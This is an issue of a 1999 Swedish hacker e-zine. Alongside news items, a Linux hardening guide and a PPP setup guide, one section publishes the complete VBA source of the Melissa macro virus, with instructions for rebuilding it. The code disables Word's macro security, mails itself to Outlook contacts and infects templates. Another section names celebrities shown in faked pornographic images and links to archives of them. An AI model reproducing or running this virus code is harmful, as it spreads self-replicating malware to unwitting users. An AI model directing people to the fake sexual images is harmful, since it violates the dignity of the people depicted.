OBS! Denna textfil ingår i ett arkiv som är dedikerat att bevara svensk undergroundkultur, med målsättningen att vara så heltäckande som möjligt. Flashback kan inte garantera att innehållet är korrekt, användbart eller baserat på fakta, och är inte heller ansvariga för eventuella skador som uppstår från användning av informationen.
____________________________________________________________________________ =======S====T====A====R====T=========O=====F=========F====I====L====E======= S W E H A C K U N D E R G R O U N D ______ _____ __ _ _______ ____/ | | \ | |______ /_____ __|__ | \_| |______ N U M M E R 6 ____________________________________________________________________________ I N N E H Å L L I S U Z # 6 [0] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ ¤ Innehåll................................................................0 ¤ Disclaimer..............................................................1 ¤ Medarbetare.............................................................2 ¤ Ledare..................................................................3 ¤ Melissa, information och källkod........................................4 ¤ Hackers efterlysta av FBI...............................................5 ¤ Linux säkerhet..........................................................6 ¤ gH protesterar mot FBI..................................................7 ¤ Antihack program hackar tillbaka........................................8 ¤ PPP i Linux.............................................................9 ¤ Hackertävling i Singapore..............................................10 ¤ Falska porrbilder på kungafamiljen finns på Internet...................11 ¤ Insändare..............................................................12 - Vad börjar hända med den gamla FNA? ¤ Hyperlänkar............................................................13 ____________________________________________________________________________ D I S C L A I M E R [1] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ All information i denna filen är skriven i utbildnings syfte. Ni kan aldrig komma och påstå att denna filen uppmanar till brott eller något annat olag- ligt. Allt ni gör efter att ni läst något ur denna filen är helt på er egen risk och ni har själv allt ansvar för följderna. Vi avskriver oss härmed allt ansvar för era handlingar. ____________________________________________________________________________ M E D A R B E T A R E [2] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Capten Kirk Axxezz Tack!! ____________________________________________________________________________ L E D A R E [3] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Hallå! Om förra numret drog ut på tiden så skulle man kunna tro att detta numret aldrig skulle komma. Det var drygt fyra(!!!) månader sedan förra numret kom, vilket är väldigt lång tid då det är planerat att det ska komma ett nummer per månad. Anledningen till denna fördröjning är att jag bl.a. inte haft någon ork eller tid att skriva, men framför allt är orsaken motivation, vilket helt saknas. Men nu är äntligen SUZ#6 här och det har införts en del förändringar inför det här numret. Bl.a. har sektionen "swehack" försvunnit eftersom dess innehåll är från och med nu inbakat i ledaren. Alltså en längre och kanske lite mer intressant ledare i fortsättningen(?). Om någon undrar hur många prenumeranter SUZ har så kan jag berätta att det här numret skickas ut till 428 stycken. Inte alltför många men jag tycker det är helt okej. Rom byggdes ju inte på en dag. Swehack Online har enligt planerna börjat erbjuda Nät-TV. Hacking programmet "Parse: Hack/Phreak" har snart visats i tre månader och kommer även visas i fortsättningen. Swehack Online har även fått en ny URL i form av eget domän, nämligen http://www.hackers-se.com/ . Den gamla adressen fungerar även den. Filarkivet skulle enligt planerna byggas ut den närmast gångna tiden men så har det inte riktigt blivit. Lite uppdateringar har dock skett och kommer så även göras den närmaste tiden framöver. För övrigt så har listan över kanalens operatörer uppdaterats samtidigt som det rördes om lite i AOP/SOP listan. Länksektionen har även den förändrats. Om det bli fler SUZ får vi se. Just nu känns det väldigt jobbigt och om SUZ överlever vet jag inte. Om någon är intresserad av att ta över och bära ansvaret för SUZ skulle jag kunna tänka mig det. Men då ska det vara seriöst! Om någon är intresserad så hör av er, men tänk först efter vad det innebär. Jag funderar på att avstå från att fortsätta att driva SUZ eftersom jag inte anser att det är rimligt för ett e-zine att ha så lång utgivningshastighet som SUZ för närvarande har. Jag kommer fortsätta skriva artiklar i framtiden, men inte så många som ett e-zine behöver för att vara ett bra och läsvärt sådant. Jag tänker inte lägga ner tid jag inte har på SUZ. Detta innebär att utgivningshastigheten kommer att vara väldigt osäker. Den tid jag får över efter att saker som måste göras är gjorda tänker jag i första hand lägga ner på Swehack Online. Jag kommer även att skriva lite artiklar till SUZ om det fortsätter. Annars får det bli lösa textfiler istället. Jag skulle vilja avsluta "ledaren" med att tacka alla er som bidraget med något till SUZ, det inte bara hjälper utan värmer också. Att det finns levande folk där ute är mycket roligt att känna av. Tack! Den senaste tiden har Axxezz varit den som pushat på mest för att SUZ skulle leva vidare. Ett speciellt tack går därför till honom! Ytterligare ett nummer av SUZ kommer i varje fall med säkerhet. Sen får vi se vad som händer... Hoppas vi hörs! // Contagion | con@linux.nu | 99-07-25 Allt rörande SUZ kan skickas till swehack@linux.nu ---------------------------------------------------------------------------- ---------------------------------------------------------------------------- ____________________________________________________________________________ M E L I S S A , I N F O & K Ä L L K O D [4] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Viruset Melissa har blivit väldigt uppmärksammat på sistone(!?). Eftersom nästan alla redan har läst och hört det mesta angående Melissa tänker jag inte tråka ut er med gammal information här. Jag tänker däremot publicera källkoden till Melissa. Här kommer den! OBS! Alla rader som börjar med !!! är brutna av mig. För att få den korrekta koden så låt alla rader som börjar med !!! bilda en rad med raden ovanför genom att tecknen på raderna som börjar med !!! sätts efter sista tecknet på raden ovanför. Glöm inte att även ta bort de tre utropstecknen (!!!). Exempel: Private Sub Docu G E R Private Sub Document_Open() !!!ment_Open() ---------> Private Sub Document_Open() On Error Resume Next If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Off !!!ice\9.0\Word\Security", "Level") <> "" Then CommandBars("Macro").Controls("Security...").Enabled = False System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Offi !!!ce\9.0\Word\Security", "Level") = 1& Else CommandBars("Tools").Controls("Macro").Enabled = False Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1): O !!!ptions.SaveNormalPrompt = (1 - 1) End If Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice Set UngaDasOutlook = CreateObject("Outlook.Application") Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI") If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Off !!!ice\", "Melissa?") <> "... by Kwyjibo" Then If UngaDasOutlook = "Outlook" Then DasMapiName.Logon "profile", "password" For y = 1 To DasMapiName.AddressLists.Count Set AddyBook = DasMapiName.AddressLists(y) x = 1 Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0) For oo = 1 To AddyBook.AddressEntries.Count Peep = AddyBook.AddressEntries(x) BreakUmOffASlice.Recipients.Add Peep x = x + 1 If x > 50 Then oo = AddyBook.AddressEntries.Count Next oo BreakUmOffASlice.Subject = "Important Message From " & Application. !!!UserName BreakUmOffASlice.Body = "Here is that document you asked for ... do !!!n't show anyone else ;-)" BreakUmOffASlice.Attachments.Add ActiveDocument.FullName BreakUmOffASlice.Send Peep = "" Next y DasMapiName.Logoff End If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Offi !!!ce\", "Melissa?") = "... by Kwyjibo" End If Set ADI1 = ActiveDocument.VBProject.VBComponents.Item(1) Set NTI1 = NormalTemplate.VBProject.VBComponents.Item(1) NTCL = NTI1.CodeModule.CountOfLines ADCL = ADI1.CodeModule.CountOfLines BGN = 2 If ADI1.Name <> "Melissa" Then If ADCL > 0 Then ADI1.CodeModule.DeleteLines 1, ADCL Set ToInfect = ADI1 ADI1.Name = "Melissa" DoAD = True End If If NTI1.Name <> "Melissa" Then If NTCL > 0 Then NTI1.CodeModule.DeleteLines 1, NTCL Set ToInfect = NTI1 NTI1.Name = "Melissa" DoNT = True End If If DoNT <> True And DoAD <> True Then GoTo CYA If DoNT = True Then Do While ADI1.CodeModule.Lines(1, 1) = "" ADI1.CodeModule.DeleteLines 1 Loop ToInfect.CodeModule.AddFromString ("Private Sub Document_Close()") Do While ADI1.CodeModule.Lines(BGN, 1) <> "" ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1) BGN = BGN + 1 Loop End If If DoAD = True Then Do While NTI1.CodeModule.Lines(1, 1) = "" NTI1.CodeModule.DeleteLines 1 Loop ToInfect.CodeModule.AddFromString ("Private Sub Document_Open()") Do While NTI1.CodeModule.Lines(BGN, 1) <> "" ToInfect.CodeModule.InsertLines BGN, NTI1.CodeModule.Lines(BGN, 1) BGN = BGN + 1 Loop End If CYA: If NTCL <> 0 And ADCL = 0 And (InStr(1, ActiveDocument.Name, "Document") = F !!!alse) Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName ElseIf (InStr(1, ActiveDocument.Name, "Document") <> False) Then ActiveDocument.Saved = True End If 'WORD/Melissa written by Kwyjibo 'Works in both Word 2000 and Word 97 'Worm? Macro Virus? Word 97 Virus? Word 2000 Virus? You Decide! 'Word -> Email | Word 97 <--> Word 2000 ... it's a new age! If Day(Now) = Minute(Now) Then Selection.TypeText " Twenty-two points, plus !!!triple-word-score, plus fifty points for using all my letters. Game's ov !!!er. I'm outta here." End Sub ---------------------------------------------------------------------------- Skrivet av Contagion | con@linux.nu Källa för koden: Okänd. ---------------------------------------------------------------------------- ____________________________________________________________________________ H A C K E R S E F T E R L Y S T A [5] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ FBI har skickat ut listor med information om hackers till ett flertal ISPs i USA. Enligt lag kräver de att dessa ISPs samarbetar och delar med sig av e-mails, bibliotek, filer, loggar, och all övrig data som har att göra med namnen på de individer, grupper, IRC-kanaler mm. som presenteras i listorna. Här följer listan över vilka individer som för tillfället är under utredning hos FBI. I den riktiga listan ges inte bara personens alias, utan även dess riktiga namn. Här följer dock bara personernas alias. Sate solarix lothos shdwknght Eckis mz_chick VectorX blackhappy sidney Twisted-- epoh f00t darkfaery status Pantera Anacarda f0nz crazygyrl taylor angelo kimmie ganja Diesl0w Texan espionage badfrog Vie blanc Borgie fenderkev Becky IO 09 d0lz ne0h iCBM Cl0pz Acidkill timebomb digital- rox Bladex Phear Blakforge ID-50 Code0 vallah nonlinea Type-0 taylor Codex jenna optic watchy cult_hero Sygma coolio Overdose wolf303 socked Cyberfire hamster P0rt wookie problem DigitalX prym MostHated Yorph mal_vu Ibanez tr0n fryz random minos Spaceg0at lure hyrid totempole series Downfall LD ghost cyberf|re ben-z Duk0r shortee Rizzy jos rslink- elf LongDistance prophet Mcintyre judy Här följer listan över IRC-kanaler som FBI är intresserade av. #creep #pascal #gayfagsex #hax0r #sex_gay #j00nix #ex0dus #gaysex #lezbiandsex #sex_pl #tk #faggotsex #hackunix #linux #shellx.log Här följer listan över vilka hacking grupper som utreds. GlobalHell, gH Darkcyde, D4rkcyde enforcers, enphorcers milw0rm 2600 hackphreak Total-ka0s, tk world domination Även en lista över "hacking tools" skickades ut. Dock är långt ifrån alla dessa program s.k. "hacking tools". T.ex. är NukeNabber ett utmärkt windows- program utvecklat för att varna om inkommande denial of service attacker, och även hjälpa användaren att ta reda på vem som ligger bakom dem. Upphovs- mannen till NukeNabber har mottagit ett flertal bidrag från olika individer och organisationer, bl.a. en donation på $500 från Nasa's JPL. Här följer i varje fall listan. abonc.c fone#2.txt Ipwatch.c spoof.exe banish.c fxp32.exe jolt.c teardrop.c boink.c H4x0rW4nG.log killwin.c thc.c bonk.c haktek.exe latierra.c thcbsd.c bpftp107b.exe hanson.c linsniff.c ward165.exe Bs.exe hax0r.itms linsniffer.c war-ftpd.exe datapipe.c hijack.c newtear.c sx5eng.exe ice2.2.c NukeNabber21.exe explorer.reg ice2.2.+T1.c ohnk.c Fone#.txt ideaud10.exe sheep.c ---------------------------------------------------------------------------- Skrivet av Contagion | con@linux.nu Källa: AntiOnline, http://www.antionline.com/ ---------------------------------------------------------------------------- ____________________________________________________________________________ L I N U X S Ä K E R H E T [6] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Eftersom det på sistone skrivits en hel del artiklar om hur man säkrar sin linux box i ett flertal internationella zine så tänkte jag att det var på sin plats att ytterligare en blev skriven fast på svenska. En del fakta kan vara plockade från andra zine och en del har jag fyllt på med själv. För att följa den här enkla guiden så behöver man kunna använda en texteditor samt förstå hur en linux installation är uppbyggd. Det borde väl inte vara några problem så långt? Då kör vi... {.InStAlLaTiOn.} ~~~~~~~~~~~~~~~~ Linux säkerhet börjar redan när systemet installeras för första gången. Som newbie frestas man av att ha ALLT på sitt splitternya och elite hacker system men låto mig visa dig vägen. :-) Tänk efter vad du ska använda ditt system till? Ska den tillhöra ett LAN? Har du fast lina <grin>? Eller ska du helt enkelt bara använda din dator till att ansluta dig till internet och surfa? Det är liknande frågor som du ska ha klart för dig INNAN du startar installationen. Annars kommer din linux box bli 0wn3D ganska snabbt av nån ond själ. Ju mer 'paket' du installerar desto mer SUID filer kommer det ju också finnas (går igenom SUID filer sen). Så var alltså relativt säker på vilka paket som innehåller vad och installera just dessa. Det kommer att öka din säkerhet markant. {.SuId FiLeR.} ~~~~~~~~~~~~~~ Gott om SUID filer ska det vara ont om på ditt system. SUID filer är sådana som körs som root. Så om du ger ut ett konto till din polare och han lyckas krasha ett SUID program medan det körs vad tror du händer då? Han tilldelas en snygg # prompt och du har just blivit 0wn3D. Så en ganska bra ide är att kolla igenom vilka SUID filer som ska finnas kvar på ditt system innan du beger dig online och delar ut konton till alla dina nära och kära. För att enklast kolla igenom alla dina SUID program så fingrar du ner följande kommando. find / -perm +4000 -print >> SuidFiler Detta letar upp alla dina SUID filer och skickar dem till en textfil som jag har valt att kalla SuidFiler. Nu är det dags att starta upp din favorit editor (testa vi ;) och kolla igenom var alla dina SUID program befinner sig. Nu måste du tänka igenom var och en av alla dessa kommandon och bestämma vilka som dina 'vanliga' användare ska få använda. Om du inte vet exakt vad ett kommando gör (tex su) så skriv 'man su' vid din prompt och du får en hel del information. Om du nu har kollat igenom och beslutat vilka filer som inte ska användas av andra än root så chmodar du alla dessa till 000. chmod 000 /var/fil/finns Lämna kvar filen SuidFiler i fall du skulle vilja veta var alla program finns om du skulle ångra dig. {.LoGgAr.} ~~~~~~~~~~ Enda sättet att få bevis för att du blivit attackerad är att ha editerat loggarna rätt. Loggarna drivs från två olika daemons som tar hand om olika områden. Klogd tar hand om alla meddelanden som kommer från kerneln medan syslogd tar hand om alla meddelanden som systemet i sig framkallar. Låt oss editera loggarna nu. Öppna filen /etc/syslog.conf med din favorit editor. Nedanstående version är hur jag själv brukar logga och jag påstår inte att det är den effektivaste eller bästa på nåt sätt men ändå. *.err /var/log/syslog *.=alert /var/log/alert *.=alert /root/Alert.LoG *.=emerg /var/log/emerg daemon.info;daemon.notice /var/log/daemons *.* /dev/tty10 Ganska självklart vad som menas men om du ändå inte riktigt fattar så skulle du kunna kolla in 'man syslog.conf' samt 'man syslogd'. {.AnDrA FiLeR.} ~~~~~~~~~~~~~~~ Bahz! Orkar inte gå igenom en och en av dessa filer men de två viktigaste ska jag nog kunna orka. :-) Om du ändå vill vara säker så 'man find. för att lära dig HUR du skulle kunna söka efter dina .conf filer. Vi börjar med att editera /etc/inetd.conf som kontrollerar vilka services din maskin ska köra. Services kan tex vara ftp,telnet och rlogin. Starta upp pico, vi eller emacs (eller vafan du vill) och kolla igenom inetd.conf. Som du kanske förstår så betyder ett # i början av vissa rader 'Skit Fullständigt I Den Här Raden Tack' Så allt du behöver göra är att sätta ett # framför alla de services som du inte vill använda. Se bara till att 'auth' inte är utkommenterad eftersom det är den som låter dig identifieras mot olika servrar. Om du inte vet ett skit om services.. *suck*.. 'man DenServiceDuUndrarÖver'.. När du har editerat klart så startar du om ditt system precis som i de gamla dagarna med windows. Hehe.. Bara skojar.. Du använder ett lite mer praktiskare OS nu. Skriv bara: kill -HUP inetd Det finns ytterligare en fil som kan configureras till en säkrare box. Vi ska nu se till att din dator vägrar låta folk logga in som root via internet. Starta din favorit (igen) editor och rikta in den på /etc/securetty. Nu ser den antagligen ut ungefär så här: console tty1 tty2 tty3 tty4 tty5 tty6 ttyS0 ttyS1 ttyS2 ttyS3 ttyS står för att remote tty:s medan de andra är dina lokala. Om du nu har lyssnat på vad som har sagts idag så borde du veta att filen ska se ut så här när du är färdig med den: console tty1 tty2 tty3 tty4 tty5 tty6 #ttyS0 #ttyS1 #ttyS2 #ttyS3 {.EfTeRoRd.} ~~~~~~~~~~~~ Nu har kanske en del av er fått ett lite säkrare system. Vad vet jag? Jag är medveten om att det är en hel del annat som också skulle kunna tas upp men jag tror att det får räcka så här tills vidare. Om ni vill att jag ska ta upp även dessa tills SuZ7 så får ni fan i mig ta och maila mig på GameOver@innocent.com och säga det. Och en sak till innan jag drar online.. Ditt system är just nu relativt säkert mot fula script-kiddies utan hjärna men tro för allt i världen inte att du har 100% fullständigt säkert system nu. Det har ingen.. Axx3zz -> #SweHack @ DALnet ---------------------------------------------------------------------------- Skrivet av Axx3zz Källa: Axx3zz ---------------------------------------------------------------------------- ____________________________________________________________________________ G H P R O T E S T E R A R M O T F B I [7] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ En medlem av gH som kallar sig själv "Israeli Ghost" tog den 25 maj ner FBI's hemsida genom Denial of Service attacker. När sidan var nere mailade han FBI med bl.a. meddelandet "FBI WILL NOT FUCKIN WITH MY FRIENDS FROM GLOBAL HELL (gH)". Han skrev också att sajten skulle stanna nere hela dagen. Även andra hackers reagerade på FBI's listor. En annan medlem i gH ändrade första sidan på www.brain3.com där följande meddelande lämnades: This is in response to the recent raiding of several gH members. gH will make it through this along with the rest of the community. The FBI = You can all fuck off. btw, You're also 0wned. The OSI = You too, go back to sucking hackers dick for info. gH IS HERE TO STAY. NO ONE WILL STOP US. NO ONE. Ytterligare en medlem i gH som kallar sig själv "infamous" ändrade ett fler- tal websidor bl.a. www.prudentialnewyork.com www.lambagency.com www.prudentialempirestate.com www.mainstproperties.com www.realnetsolutions.com www.montauk.net www.craftsmenhomes.com www.morleyagency.com www.morleyagency.com www.moviespotlight.com www.cookpony.com www.seashellre.com www.century21rustic.com www.siwicki.com www.abatelli.com www.strough.com www.devlin-mcniff.com www.stype.com www.dunemere.com www.symaco.com www.firsttowne.com www.tradewindsre.com www.hampton.net www.victorianrealty.com www.hanfra.com www.villagere.com Han lämnade ett medelande liknande det som skrevs in på www.brain3.com. ---------------------------------------------------------------------------- Skrivet av Contagion | con@linux.nu Källa: AntiOnline, http://www.antionline.com/ ---------------------------------------------------------------------------- ____________________________________________________________________________ P R O G G E T H A C K A R T I L L B A K A [8] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Just nu sitter ett företag, Futur Vision Group, i USA och utvecklar ett "antihack" program som har fått namnet Blitzkrieg. Enligt företaget så är Blitzkrieg en blandning av artificiell intelligens och biologiska idéer. Kärnan i systemet, parabellumserver, ska själv övervaka de utsatta datorerna. Med hjälp av artificiell intelligens så ska kärnan leta dolda mönster i det sätt användarna uppför sig på när det är i kontakt med datorn. Målet är att avslöja brottslingen innan han/hon gör någon skada. I händelse av angrepp ska Blitzkriegprogramet sätta igång en rad av åtgärder. Enligt tillverkarna skall man kunna ställa in Blietzkriegprogrammet hacka tillbaka. Att programmet skall kunna hacka tillbaka har fått mycket kritik. Är det rätt att hacka tillbaka någons dator som Blitzkrieg tror är hackerns dator? Tänk om datorn tillhör en oskyldig?! Personligen tror jag inte på det här programmet. Men försäljarna får det att låta bra för operatörer som tror att det kommer att låsa ute hackers. Sen fattar jag inte varför han som skrivit artikeln så jävla negativt. Det låter som vi hackers är någon rå vänster anarkist militär vegan tjossan som vill förstöra allt. ---------------------------------------------------------------------------- Skrivet av Capten Kirk Källa: Illustrerad Vetenskap Nr5. 1999 ---------------------------------------------------------------------------- ____________________________________________________________________________ P P P I L I N U X [9] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ {.InTrOdUkTiOn.} ~~~~~~~~~~~~~~~~ Oerhört ofta ser man frågor om PPP i diverse linux distributioner i kanaler såsom SweHack och andra kanaler inriktade för mer avancerade användare. Nu en gång för alla tänkte jag klargöra hur man går tilläga för att få en lyckad anslutning från början. Detta gäller givetvis i alla distributioner men jag är osäker på hur det är enklast gjort i bland andra debian och caldera. Men om man väljer att använda dessa som första val och inte vet hur man får en lyckad PPP anslutning så får de skylla sig själva. Men om du vill veta hur man enklast gör det i de mest använda distributionerna såsom RedHat och Slackware så ska den här texten nog komma till användning. Jag kommer använda programmen netcfg i RedHat och senare kommentera pppsetup i Slackware samt en del notiser hur man kan göra från console. En annan faktor är ju vilken ISP man använder men som oftast ska inte detta vara några problem så länge man inte använder utfors. Enligt vad jag hört så är det inte möjligt att komma online med utfors i linux. Men vad vet jag? {.MoDeMeT.} ~~~~~~~~~~~ Ta reda på vilken port ditt modem sitter på. Antagligen så kommer du fram till att det sitter antingen på com1 eller com2. Starta nu kontrollpanelen genom att skriva control-panel i en xterm. Öppna programmet som konfigurerar ditt modem och ange vilken port ditt modem sitter på och konfirmera. Nu vet linux var det ska leta efter modemet när det är dags att komma online. Och som en extra notis ska vi nämna att com1 är samma sak som cua0 i linux och därmed så är com2 samma sak som cua1. Det betyder alltså att man lika gärna skulle kunna göra det här genom att använda oss utav consolen. Så här skulle det kunna se ut. # cd /dev # ln -sf /dev/cuaX /dev/modem {.InStÄlLnInGaR.} ~~~~~~~~~~~~~~~~~ Nu har vi kommit så långt så att vi måste skapa själva anslutningen. Starta netcfg genom att skriva netcfg i en xterm (doh!). Först och främst ska du här skriva in vilken namnserver du vill använda och vilken domän (ISP) du ska använda. För att ert arbete ska bli lättare så har jag rotat fram hur det kan vara för de vanligaste leverantörerna. -TeLiA- telia.com / 10.0.0.1 -TeLe2- swipnet.se / 130.244.127.161 -AlGoNeT- algonet.se / Klicka dig nu fram till fliken 'Interfaces'. Välj add alternativet och ange vilket slag av anslutning du vill använda. PAP är den vanligaste och fungerar på alla de vanligaste internetleverantörerna. Klicka dig fram steg för steg och fyll i ditt användarnamn, lösenord och vilken modempol du ska använda. Till sist ska du nu spara. Detta kan man också göra i consolen genom att skapa sitt eget ppp script och editera /etc/resolv.conf men det ska vi inte gå in på här eftersom vi ska hålla det så lätt som möjligt. Däremot så ska vi ta oss en titt på /etc/resolv.conf iaf så ni förstår hur den används i framtiden. Så här kan det se ut. Enkelt och självklart. search telia.com nameserver 10.0.0.1 {.CoNnEcTa.} ~~~~~~~~~~~~ Det allra lättaste sättet händer i detta fallet från console läge (som vanligt). Men först ska vi beskriva hur du connectar 'grafiskt'. I samma program som vi använde förut (netcfg) och samma flik som vi senast använde (Interfaces) så har just din anslutning lagts till där efter du sparade dina inställningar. Markera din anslutning och klicka på activate. Förhoppningsvis ska nu ditt modem ringa upp utan problem. Men som sagt så kan detta göras enklare från console eller en xterm. # /sbin/ifup ppp0 Lite väl mycket att skriva så ett råd är att skapa ett alias istället så allt går snabbt och smärtfritt. Om ditt modem inte ringde upp så är det första du ska göra att kolla in filen /var/log/messages med din favoriteditor. Längst ner i den här filen finns antagligen ett meddelande om varför det misslyckades. Om du inte själv klarar tyda det så vet du vart du ska/kan vända dig. {.EfTeRoRd.} ~~~~~~~~~~~~ Det här var alltså en guide om hur man lättast ansluter med linux. Vanligtvis ska inte det här vara några problem (om du nu inte klantat till det själv) eftersom linux blir allt bättre på pnp. Men om du har nåt speciellt skäl till varför du inte kommer online så är den här filen antagligen inget att ha. Jag hade själv en hel del problem med PPP efter jag uppgraderat min kernel till 2.2.9 ;-). Och som jag sa tidigare i filen. Att jag skulle förklara pppsetup i Slackware. Det ska jag göra precis NU! Skriv pppsetup i consolen och skriv in dina inställningar. - Axxezz ---------------------------------------------------------------------------- Skrivet av Axx3zz Källa: Axx3zz ---------------------------------------------------------------------------- ____________________________________________________________________________ H A C K E R T Ä V L I N G [10] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ En hackertävling i Singapore, där vinstsumman är 10 000 dollar, startade den 3/g. För att få lov att ställa upp i tävlingen var man tvungen att först bryta sig in i tre webservrar. Det var till Voltaire Advanced Data Security, Conclave Integrated Internet Security och Infinitum som deltagarna var tvungna att antingen överföra en fil till, eller ändra på servrarnas webbsidor. ---------------------------------------------------------------------------- Skrivet av Contagion | con@linux.nu Källa: Windows NT knäckt på 60 minuter av Joacim von Braun ---------------------------------------------------------------------------- ____________________________________________________________________________ F A L S K A P O R R B I L D E R [11] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ På en svensk websida kallad "Faked Swedish Celebs by Xenon" visades falska porrbilder på kungafamiljen och andra kändisar. Ansikten från 46 kändisar hade klippts ihop med kroppar från porrmodeller. Sidan stängdes dock den 19 juli och följande meddelande lämnades. "Denna sida är nu stängd. Pga all publicitet har jag beslutat att ta bort sidan och alla bilder. Sidan kommer INTE att komma upp igen. Om jag hade vetat att det var olagligt med fejkade bilder hade jag ALDRIG lagt upp sidan på nätet. Jag vädjar till alla som tankat ner mina bilder att ta bort dem. Jag ber tusen gånger om ursäkt till alla som känt sig stötta av bilderna." - Det här är mycket allvarligt, det grövsta vi råkat ut för, säger hovets presschef, Elisabeth Tarras-Wahlberg till Expressen. Här följer en lista över de kändisar som ofrivilligt medverkade på pornografiska bilder på "Faked Swedish Celebs by Xenon". - Victoria Bernadotte, kronprinsessa - Madeleine Bernadotte, prinsessa - Carl XVI Bernadotte, konung - Bengt Bauler, skådespelare i "Rederiet". - Carina Lidbom, i "Rederiet". - Charlotte Nilsson, sångerska. - Cajsa-Lisa Ejemyr, popartist och skådespelerska i "Vita lögner". - Dominika Persynski, programledare i tv. - Ebba Blitz, programledare i tv. - Kajsa Mellgren, programledare i tv. - Robyn Carlsson, popartist. - Rebecka Liljeberg, skådespelerskor i "Fucking Åmål". - Alexandra Dahlström, skådespelerskor i "Fucking Åmål". - Sofia Eriksson, programledare i tv. - Allan Svensson, skådespelare i "Svensson, Svensson". - Chelsie Dickson, skådespelare i "Svensson, Svensson". - Per Moberg, skådespelare i "Vita lögner. - Petra Hultgren, skådespelerska i "Vita lögner". - Agneta Sjödin, programledare i tv. - Emilia, popartist. - Petra Nordlund, nyhetsankare i TV4. - Tess i La Cream, popartist. - Emma-Helena Nilsson, fröken Sverige 1999. - Therese Grankvist, sångerska i Drömhus. - Gry Forsell, programledare i tv. - Jessica Olérs, fröken Sverige 1998. - Hanna Ahlström, skådespelerska i "Vita lögner". - Tilde De Paula, programledare i tv. - Viktoria Tolstoy, sångerska. - Pernilla Wiberg, slalomåkare. - Dee, E-Types dansare. - Abba Teens, popartister. - Isabel Munshi, skådespelerska i "Vita lögner". - Eric Rydman, skådespelare i "Vita lögner". - Sanna Ekman, skådespelerska och programledare i tv. - Mi Ridell, skådespelerska. - Jenny Ulving, skådespelerska. - Hannah Graaf, fotomodell och popartist. - Pia Green, skådespelerska i "Vita lögner". - Ulf Dohlsten, skådespelare i "Vita lögner". - Lena B Nilsson, skådespelerska i "Vita lögner". - Karin Bergquist, skådespelerska i "Vita lögner". - Rune Sandlund, skådespelare i "Vita lögner". - Carl Kjellgren, skådespelare i bland annat "Pappas flicka". - Maria Simonsson, skådespelerska i "pappas flicka". - David Boati, skådespelare i "Pappas flicka". Den stoppade sidan "Faked Swedish Celebs by Xenon" fanns tidigare på följande adress: http://freehosting1.at.webjump.com/xe/xenonscelebs-webjump/ Nu finns det mirrors av sidan på ett flertal sidor, vilka en del länkas från Flashback Online (http://www.flashback.se/). Ett av många arkiv över bilderna finns på: http://www.geocities.com/Paris/Cinema/5343/ ---------------------------------------------------------------------------- Skrivet av Contagion | con@linux.nu Källa: I huvudsak FNA #121 ---------------------------------------------------------------------------- ____________________________________________________________________________ I N S Ä N D A R E [12] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ ---------------------------------------------------------------------------- Vad börjar hända med den gamla FNA? ---------------------------------------------------------------------------- Vart tog den gamla goa FNA vägen? Jag tycker FNA börjar tappa lite av sin underground stil. Även om FNA idag är det särklass bästa och största e-zinet inom underground så börjar det tappa. Om man ser i FNA #119 så finns det många artiklar man kan undra om de kommit in av misstag. Jag menar vad har t.ex. artiklarna "Nya drinktips (4.01)", "De fyra värsta frågorna kvinnor ställer (4.03)" och "Skillnaden på 18- och 28-åriga tjejer (4.06)" i FNA att göra över huvud taget? Inte kallar jag det undergrond. Det är artiklar som hör hemma på skrattnet och liknande sajter. Visserligen finns det även många bra saker i FNA, men varför inte nöja sig med bara dessa? ---------------------------------------------------------------------------- Skrivet av Contagion | con@linux.nu ---------------------------------------------------------------------------- ____________________________________________________________________________ H Y P E R L Ä N K A R [13] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ http://www.hackers-se.com/ Swehack Online's nya domän! ---------------------------------------------------------------------------- ---------------------------------------------------------------------------- ____________________________________________________________________________ __ _ _ _____ / _\ | | | | / _ / Redaktör: Contagion | con@linux.nu \ \ | | | | \// / _\ \ | |_| |_ / //\_ Hemsida: 